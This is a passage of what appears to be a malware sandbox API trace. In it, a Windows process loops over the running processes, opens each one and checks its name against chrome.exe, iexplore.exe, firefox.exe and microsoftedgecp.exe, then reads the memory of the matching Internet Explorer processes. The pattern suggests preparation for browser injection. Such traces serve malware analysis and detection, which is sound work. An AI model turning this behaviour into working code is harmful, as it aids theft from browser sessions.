	[0221.288] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0221.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5070
	[0221.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.290] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0221.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.290] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.291] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0221.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.291] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5074
	[0221.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.292] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.293] NtQueryInformationProcess (in: ProcessHandle=0x5074, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.294] ReadProcessMemory (in: hProcess=0x5074, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.294] ReadProcessMemory (in: hProcess=0x5074, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.294] ReadProcessMemory (in: hProcess=0x5074, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.294] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5078
	[0221.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.296] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.296] NtQueryInformationProcess (in: ProcessHandle=0x5078, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.296] ReadProcessMemory (in: hProcess=0x5078, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.296] ReadProcessMemory (in: hProcess=0x5078, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.296] ReadProcessMemory (in: hProcess=0x5078, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.296] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x507c
	[0221.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0221.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5080
	[0221.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.299] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0221.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.299] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.300] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0221.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.300] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5084
	[0221.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.301] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.302] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.302] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5088
	[0221.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.304] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.304] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.304] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.305] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.305] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x508c
	[0221.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.306] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.306] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.307] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.307] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5090
	[0221.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.308] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.308] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.309] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.309] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0221.310] CloseHandle (hObject=0x4fd0) returned 1
	[0221.310] Sleep (dwMilliseconds=0x64) 
	[0221.412] GetCurrentProcessId () returned 0x110
	[0221.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0221.415] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0221.416] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0221.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0221.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5094
	[0221.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.418] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.419] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.419] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.419] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5098
	[0221.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.421] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.421] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.422] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.422] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0221.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x509c
	[0221.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.424] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0221.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.424] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.425] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0221.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.425] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x50a0
	[0221.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.428] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.429] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.430] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.431] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0221.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x50a4
	[0221.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.433] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0221.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.434] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.435] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0221.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.436] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0221.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x50a8
	[0221.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.437] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0221.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.438] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.438] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0221.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.439] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0221.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x50ac
	[0221.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.441] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0221.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.441] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.441] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0221.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.442] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0221.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x50b0
	[0221.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.472] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.472] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.472] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.473] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x50b4
	[0221.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.475] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.475] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.476] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x50b8
	[0221.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.477] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x50bc
	[0221.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.479] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.479] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.480] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.480] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x50c0
	[0221.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.481] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.481] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.481] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.482] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.482] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x50c4
	[0221.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
